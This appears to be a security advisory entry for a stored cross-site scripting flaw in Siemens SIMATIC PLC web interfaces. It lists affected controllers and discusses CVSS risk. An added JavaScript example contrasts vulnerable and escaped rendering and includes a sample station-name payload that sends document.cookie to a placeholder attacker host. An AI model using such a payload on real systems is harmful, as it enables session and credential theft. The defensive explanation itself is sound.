Impact
The vulnerability is a stored cross-site scripting (XSS) flaw: the affected Siemens web interfaces do not validate or HTML-escape the PLC or station name before rendering it on the Communication parameters page. An attacker who is authorized to download a TIA project to the device can set the name to a string containing arbitrary JavaScript. Because the name is stored on the device, the payload fires every time a user with suitable rights opens that page, executing in that user's browser session with the web interface's origin. The injected script can read or exfiltrate credentials and session cookies reachable from the page, issue requests in the victim's session, and otherwise act with the privileges of the affected user.
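The rendering defect described above, and the fix that closes it, as an added example that is not part of the original advisory or of Siemens' firmware: a stored station name is concatenated straight into page markup (vulnerable) versus passed through an HTML output encoder first (hardened). The page layout, the `renderVulnerable`/`renderSafe` helpers and the sample station name are all constructed for illustration; the real page's markup is not shown in the advisory.

```javascript
// Added example (not Siemens code): output encoding for an attacker-controlled
// PLC/station name that is stored on the device and later rendered into HTML.

// Constructed sample input: a station name carrying a script payload of the kind
// an attacker with TIA project download rights could store on the controller.
const STATION_NAME_MALICIOUS =
  'PLC_1"><img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">';
const STATION_NAME_BENIGN = 'PLC_1';

// Vulnerable pattern: the stored name is interpolated directly into markup, so any
// '<', '>' or '"' in it becomes part of the page structure instead of text.
function renderVulnerable(stationName) {
  return `<tr><td>Station name</td><td>${stationName}</td></tr>`;
}

// HTML entity encoding for the text and double-quoted attribute contexts.
// Every character that can open or close markup is replaced with its entity.
function escapeHtml(value) {
  const map = {
    '&': '&amp;', '<': '&lt;', '>': '&gt;',
    '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
  };
  return String(value).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Hardened pattern: same template, but the untrusted value is encoded on output.
// (In a live DOM, assigning the name to element.textContent achieves the same.)
function renderSafe(stationName) {
  return `<tr><td>Station name</td><td>${escapeHtml(stationName)}</td></tr>`;
}

// Check used to compare both renderings: does a tag that originated in the
// station name (not in the template) survive into the output as real markup?
function containsInjectedTag(html) {
  return /<(img|script|svg|iframe)\b/i.test(html);
}

// Stand-alone demonstration.
console.log('vulnerable:', renderVulnerable(STATION_NAME_MALICIOUS));
console.log('injected tag present:', containsInjectedTag(renderVulnerable(STATION_NAME_MALICIOUS)));
console.log('hardened:  ', renderSafe(STATION_NAME_MALICIOUS));
console.log('injected tag present:', containsInjectedTag(renderSafe(STATION_NAME_MALICIOUS)));
```

The encoder is context-specific: it is correct for HTML text and double-quoted attribute values, which is where a displayed name belongs, but it would not make the name safe inside a `<script>` block, a URL, or an inline event handler. Validating the name on input (for example, rejecting `<`, `>` and quotes when the project is downloaded) is a useful second layer, but output encoding at the point of rendering is the control that actually closes the XSS.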
Affected Systems
Affected Siemens devices include the SIMATIC Drive Controllers (CPU 1504D TF, CPU 1507D TF), the SIMATIC ET 200SP family (CPUs 1510SP, 1512SP, 1514SP, 1515SP and their variants), the SIMATIC S7‑1500 controllers (CPUs 1511‑1, 1511C‑1, 1513pro, 1515‑2, 1516‑3, 1518‑4 and related models), the SIMATIC ET 200pro (CPUs 1513PRO, 1516PRO), the SIMATIC S7‑1500 software controllers (various 1507S, 1508S, Linux and advanced PLCSIM variants), and the SIPLUS derivatives of the ET 200SP and S7‑1500 lines.
Risk and Exploitability
The CVSS score of 9.3 places the flaw in the Critical band (9.0 to 10.0). No EPSS score is available and the vulnerability is not listed in the CISA KEV catalog, so there is no public evidence of exploitation in the wild; absence from these sources does not prove it is unexploited. Exploitation requires an authenticated attacker who is authorized to download a TIA project to the controller, so the realistic attack paths are a malicious or careless insider, compromised engineering credentials, or a tampered TIA project file. Once the payload is stored in the name it persists on the device and runs in the browser of every user who views the Communication parameters page, giving the attacker that user's capabilities within the web interface. Restricting who may download projects to the PLCs and protecting the integrity of TIA projects therefore limits exposure until a fixed version is installed.
OpenCVE Enrichment